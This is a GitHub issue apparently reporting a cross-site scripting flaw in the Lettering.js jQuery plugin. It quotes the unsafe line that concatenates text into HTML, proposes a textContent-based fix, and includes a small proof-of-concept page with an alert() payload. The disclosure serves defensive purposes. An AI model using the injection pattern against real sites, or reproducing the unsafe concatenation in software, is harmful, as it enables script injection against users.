Skip to content

Security issue: XSS for methods 'lines' and 'words' #88

New issue
New issue
Open
Open
Security issue: XSS for methods 'lines' and 'words'#88
Labels
Bug
@pcworld

Description

@pcworld
pcworld
opened on Apr 19, 2020

The injector first extracts the DOM text representation, then inserts it into HTML:

Lettering.js/jquery.lettering.js

Line 20 in d06bb73

inject += '<span class="'+klass+(i+1)+'" aria-hidden="true">'+item+'</span>'+after;

Thus even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing for cross-site-scripting (XSS).
This is probably only exploitable in the "lines" and "words" methods, because the default method splits into characters, and the < in <span><</span> is parsed as text by browsers.

Solution

Create the <span> programmatically using document.createElement and set the content using textContent.

Exploit

<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<div id="exploitme">&lt;script&gt;alert(&quot;I'm properly escaped HTML&quot;);&lt;/script&gt;</div>
<script>
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>

A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.

Metadata

Metadata

Assignees

No one assigned

    Labels

    Bug

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions